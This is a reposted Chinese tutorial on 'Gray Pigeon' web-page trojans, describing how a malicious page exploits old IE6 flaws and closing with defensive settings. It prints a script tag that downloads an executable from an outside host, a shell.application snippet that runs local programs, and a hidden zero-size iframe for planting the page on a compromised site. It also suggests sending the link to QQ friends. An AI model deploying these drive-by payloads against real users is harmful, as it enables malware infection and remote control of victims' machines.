“灰鴿子”網頁木馬從原理、製作到防範(圖)

來源:互聯網
上載者:User

事物都有兩面性。本文介紹的網頁木馬製作技巧,意在加強大家的防範意識,而不是想“荼毒生靈”。希望能給大家帶來一些協助,營造一個安全的上網環境。

  如果你訪問××網站(國內某門戶網站),你就會中灰鴿子木馬。這是我一駭客朋友給我說的一句說。開啟該網站的首頁,經檢查,我確實中了灰鴿子。怎麼實現的呢?他說,他侵入了該網站的伺服器並在網站首頁上掛了網頁木馬;一些安全專家常說,不要開啟陌生人發來的網址,為什嗎?因為該網址很有可能就是一些不懷好意者精心製作的網頁木馬。

  以上只是網頁木馬的兩種形式,實際上網頁木馬還可以掛在多媒體檔案(RM、RMVB、WMV、WMA、Flash)、電子郵件、論壇等多種檔案和場合上。很可怕吧,那麼使用者如何防範網頁木馬呢?下面我們就先從網頁木馬的攻擊原理說起。

一、網頁木馬的攻擊原理

  首先明確,網頁木馬實際上是一個HTML網頁,與其它網頁不同的是該網頁是駭客精心製作的,使用者一旦訪問了該網頁就會中木馬。為什麼說是駭客精心製作的呢?因為嵌入在這個網頁中的指令碼恰如其分地利用了IE瀏覽器的漏洞,讓IE在後台自動下載駭客放置在網路上的木馬並運行(安裝)這個木馬,也就是說,這個網頁能下載木馬到本地並運行(安裝)下載到本地電腦上的木馬,整個過程都在後台運行,使用者一旦開啟這個網頁,下載過程和運行(安裝)過程就自動開始。

  有朋友會說,開啟一個網頁,IE瀏覽器真的能自動下載程式和運行程式嗎?如果IE真的能肆無忌憚地任意下載和運行程式,那天下還不大亂。實際上,為了安全,IE瀏覽器是禁止自動下載程式特別是運行程式的,但是,IE瀏覽器存在著一些已知和未知的漏洞,網頁木馬就是利用這些漏洞獲得許可權來下載程式和運行程式的。下面我舉IE瀏覽器早期的一個漏洞來分別說明這兩個問題。

 ⒈自動下載程式

  <SCRIPT LANGUAGE="icyfoxlovelace" src="http://go163go.vicp.net/1.exe"></SCRIPT>

  小提示:代碼說明

  a. 代碼中“src”的屬性為程式的網路地址,本例中“http://go163go.vicp.net/1.exe”為我放置在自己Web伺服器上的灰鴿子服務端安裝程式,這段代碼能讓網頁下載該程式到瀏覽它的電腦上。

  b. 也可以把木馬程式上傳到免費的首頁空間上去,但免費空間出於安全的考慮,多數不允許上傳exe檔案,駭客可能變通一下把副檔名exe改為bat或com,這樣他們就可以把這些程式上傳到伺服器上了。

  把這段代碼插入到網頁原始碼的</BODY>…</BODY>之間(1),然後用沒打補丁的IE6開啟,接下來,開啟IE的臨時目錄<Temporary Internet Files>,你會發現,在該檔案夾中有一個“1.exe”檔案,這也就是說,該網頁已自動下載了我放置在Web伺服器上的灰鴿子木馬。

圖1 網頁木馬樣本

相關連結:
無毒神話被打破:Mac OS X首遇木馬
新木馬竟"綁架"使用者檔案 索要300美元贖金
讓網頁木馬滾開 | 4月5日灰鴿子大範圍發作

  小提示:灰鴿子木馬

  為什麼一定要用灰鴿子木馬呢?因為灰鴿子是反彈型木馬,該木馬能繞過天網等大多數防火牆的攔截,中馬後,服務端即被控端能主動串連控制端(用戶端),也就是說,一旦被控端串連到Internet,在控制端那裡,被控端就會“自動上線”(2)。

圖2 灰鴿子控制短樣本(汗!又一大毒梟:))

  ⒉自動運行程式

  <SCRIPT LANGUAGE="javascript" type="text/javascript"> var shell=new ActiveXObject("shell.application"); shell.namespace("c:\\Windows\\").items().item("Notepad.exe").invokeverb(); </SCRIPT>

  把這段代碼插入到網頁原始碼的</BODY>…</BODY>之間,然後用IE開啟該網頁,你會發現,這段代碼可以在沒有打相關補丁的IE6中自動開啟記事本。

  這段代碼使用了shell.application控制項,該控制項能使網頁獲得執行許可權,替換代碼中的“Notepad.exe”(記事本)程式,可以用它自動運行本地電腦上的任意程式。

  通過以上的代碼我們可以看出,利用IE的漏洞,也就是說在網頁中插入適當的代碼,IE完全可以自動下載和運行程式,不過,IE一旦打了相關補丁,這些代碼就會失去作用。另外,這些代碼要運行和下載程式,有些殺毒軟體的網頁監控會視它們為病毒,為了逃避追殺,駭客可能會使用一些工具對網頁的原始碼進行加密處理(3)。

圖3 加密後的網頁代碼

相關連結:
無毒神話被打破:Mac OS X首遇木馬
新木馬竟"綁架"使用者檔案 索要300美元贖金
讓網頁木馬滾開 | 4月5日灰鴿子大範圍發作

二、網頁木馬的基本用法

  理解了網頁木馬攻擊的原理,我們可以製作自己的網頁木馬,但這需要你根據IE漏洞寫出利用代碼。實際上,在網上有很多高手已寫出了一些漏洞的利用代碼,有的還把它寫成了可視化的程式。在搜尋引擎輸入“網頁木馬產生器”進行搜尋,你會發現,在網上有很多利用IE的各種漏洞編寫的網頁木馬產生器,它們大都為可視化的程式,只要你有一個木馬(該木馬必須把它放置到網路上),利用這些產生器你就可以立即產生一個網頁,該網頁就是網頁木馬,只要他人開啟這個網頁,該網頁就可以自動完成下載木馬並運行(安裝)木馬的過程。

  在我的電腦上我已下載了一個網頁木馬產生器,下面我們來看怎麼產生網頁木馬並讓他人中木馬。

  第一步:啟動該網頁木馬產生器,4所示,在文字框中輸入木馬的網路地址,最後單擊“產生”。

圖4 網頁木馬產生器

  第二步:在網頁木馬產生器的安裝資料夾會產生一個網頁檔案,該檔案就是我們在上一步產生的網頁木馬。上傳該檔案到自己的Web伺服器或免費主面空間。

  現在好了,把上述網頁在伺服器上的地址(網址)通過QQ發給自己的好友,一旦他訪問了該網頁,該網頁就會在他的電腦上自動下載並運行你放置在網路上的木馬。

  現在你該明白安全專家勸告的“不要開啟陌生人發來的網路地址”這句話的真諦了吧!實際上,即使人人都不開啟陌生人發來的網址,也仍然有一些人“飛蛾補燈,自尋死路”,因為若大的Internet,總會有一些人會有意或無意地訪問這些網址,而且,有些網頁木馬,還掛在一些知名網站上(根據知名網站的訪問量,你算算吧,每天有多少人中了木馬!)。

  小提示:你可能還沒想到,看電影,在論壇查看或回複文章也能中木馬。實際上,網頁木馬還可以掛在多媒體檔案、電子郵件、論壇、CHM電子書上,這樣,使用者一旦觀看電影、查看或預覽郵件(主要是一些用電子郵件群發器發送的垃圾郵件)、參與文章,開啟電子書,使用者就會中網頁木馬。

  在下面我們只介紹駭客如何在知名網站上掛網頁木馬。下面來看這一段代碼:iframe src="http://go163go.vicp.net/hk.htm" width="0" height="0" frameborder="0"></iframe>

相關連結:
無毒神話被打破:Mac OS X首遇木馬
新木馬竟"綁架"使用者檔案 索要300美元贖金
讓網頁木馬滾開 | 4月5日灰鴿子大範圍發作

  小提示:“src”的屬性“http://go163go.vicp.net/hk.htm”是上傳到伺服器上的網頁木馬的網址。

  把這段代碼插入到某門戶網站首頁原始碼的</BODY>…</BODY>之間,從表面上看,插入後該門戶的首頁並沒有什麼變化,但是,所有訪問了該門戶網站首頁的人都會中木馬,為什麼會這樣呢?這是因為這段代碼中<iframe>標籤把網頁木馬網頁隱藏性地“包含”在了插入代碼的網頁當中。

  <iframe>也叫浮動幀標籤,它可以把一個HTML網頁嵌入到另一個網頁裡實現“畫中畫”的效果(5),被嵌入的網頁可以控制寬、高以及邊框大小和是否出現捲軸等。在上代代碼中,因為把寬(width)、高(height)、邊框(frameborder)都設定為了“0”,所以,上述代碼插入到門戶網站的首頁後,網站的首頁不會發生變化,但是,由於嵌入的網頁實際上已經開啟了,所以網頁上的下載木馬和運行木馬的指令碼還是會隨著門戶首頁的開啟而執行的。

圖5 iframe標籤樣本

  也許有人會問,如何把上述代碼插入到門戶網站首頁的原始碼中?這個問題問得好,本人才疏學淺,確實無法進入他們的伺服器修改網頁,但是駭客如果發現了這些伺服器上的漏洞且獲得了webshell許可權,那麼修改他們的網頁就跟在本地製作一個網頁一樣容易。

  有人還問,拿到伺服器的webshell許可權容易嗎?如果你對網路安全比較關注,你會發現,經常有這個網站被黑了,那個網站的首頁被修改了的新聞爆出。

  有人還問,門戶的伺服器幾乎無漏洞可找,個人伺服器的漏洞較多,你能進入嗎?本人不是駭客,中華人民共和國的法律規定,入侵和篡改他人伺服器上的資訊是違法行為,希望大家共同維護網路安全。

  以前,在網上開啟一些有名的網站時殺毒軟體也會警示,現在你明白其中的道理了吧。有些人在這些網站發文章罵娘,看了本文,希望在罵娘時你也能為那些墊背的站長想想。

相關連結:
無毒神話被打破:Mac OS X首遇木馬
新木馬竟"綁架"使用者檔案 索要300美元贖金
讓網頁木馬滾開 | 4月5日灰鴿子大範圍發作

三:網頁木馬的防範策略

  網頁木馬的防範只靠殺毒軟體和防火牆是遠遠不夠的,因為一旦駭客使用了反彈連接埠的個人版木馬(個人反組譯碼的一些殺毒軟體無法識別的木馬),那麼殺毒軟體和防火牆就無可奈何,所以,網頁木馬的防範要從它的原理入手,從根子上進行防範。

  ㈠即時安裝安全補丁

  網頁木馬都是利用IE漏洞進行傳播的,我們拿冰狐浪子的網頁木馬(用“冰狐浪子網頁木馬產生器”製作的網頁木馬)來說吧,該網頁能繞過IE的安全設定,當使用者串連到該網頁時,它能在普通使用者不知情的情況下在後台下載一個木馬並運行(安裝)該木馬。所以,經常到微軟網站去下載並安裝最新的安全補丁是防範網頁木馬比較有效辦法。

  ㈡改名或卸載(反註冊)最不安全的ActiveXObject(IE外掛程式)

  在系統中有些ActiveXObject會運行EXE程式,比如本文中“自動運行程式”代碼中的Shell.application控制項,這些控制項一旦在網頁中獲得了執行許可權,那麼它就會變為木馬啟動並執行“溫床”,所以把這些控制項改名或卸載能徹底防範利用這些控制項的網頁木馬。但是ActiveXObject是為了應用而出現的,而不是為了攻擊而出現的,所有的控制項都有它的用處,所以在改名或卸載一個控制項之前,你必須確認這個控制項是你不需要的,或者即使卸載了也不關大體的。

  ⒈卸載(反註冊)ActiveXObject

  第一步:在“開始”菜單上單擊“運行”,輸入“CMD”命令開啟命令提示字元視窗。

  第二步:在命令提示字元下輸入“regsvr32.exe shell32.dll /u/s”,然後斷行符號就能將Shell.application控制項卸載。

  如果日後我們希望繼續使用這個控制項的話,可以在命令提示字元視窗中輸入“regsvr32.exe shell32.dll /i/s”命令將它們重新安裝(註冊)。在上述命令中:“regsvr32.exe”是註冊或反註冊OLE對象或控制項的命令,[/u]是反註冊參數,[/s]是寂靜模式參數,[/I]為安裝參數。

  ⒉改名ActiveXObject

  需要說明的是,改名一個控制項時,控制項的名稱和CLSID(Class ID)都要改,並且要改徹底了。下面仍以Shell.application為例來介紹方法。

  第一步:開啟登錄編輯程式,尋找“Shell.application”。用這個方法能找到兩個登錄機碼:“{13709620-C279-11CE-A49E-444553540000}”和“Shell.application”。

  第二步:把{13709620-C279-11CE-A49E-444553540000}改為{13709620-C279-11CE-A49E-444553540001},注意,不要和系統中的其它CLSID重複。

  第三步:把“Shell.application”改名為“Shell.application_xxx”。以後用到這個控制項的時候你使用這個名稱就可以正常調用此控制項了。

相關連結:
無毒神話被打破:Mac OS X首遇木馬
新木馬竟"綁架"使用者檔案 索要300美元贖金
讓網頁木馬滾開 | 4月5日灰鴿子大範圍發作

  ㈢提高IE的安全層級,禁用指令碼和ActiveX控制項

  經筆者的測試,用冰狐浪子的“網頁木馬專業版產生器”產生的網頁木馬,只要調高IE的安全層級,或者禁用指令碼,該網頁木馬就不起作用了。從木馬的攻擊原理我們可以看出,網頁木馬是利用IE指令碼和ActiveX控制項上的一些漏洞下載和運行木馬的,只要我們禁用了指令碼和ActiveX控制項,就可以防止木馬的下載和運行。

  小提示:禁用指令碼和ActiveX控制項會使一些網頁的功能和效果失去作用,所以是否禁用,你要根據自己對安全的需要來定。

  第一步:在IE瀏覽器的功能表列上選擇“工具→Internet選項”開啟“Internet選項”對話方塊。

  第二步:在“安全”選項卡上,在Internet和本地Internet地區,分別把滑塊移動到最高(6),或者點擊“自訂層級”,在開啟的對話方塊上禁用指令碼,禁用ActiveX控制項。

聯繫我們

該頁面正文內容均來源於網絡整理,並不代表阿里雲官方的觀點,該頁面所提到的產品和服務也與阿里云無關,如果該頁面內容對您造成了困擾,歡迎寫郵件給我們,收到郵件我們將在5個工作日內處理。

如果您發現本社區中有涉嫌抄襲的內容,歡迎發送郵件至: info-contact@alibabacloud.com 進行舉報並提供相關證據,工作人員會在 5 個工作天內聯絡您,一經查實,本站將立刻刪除涉嫌侵權內容。

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.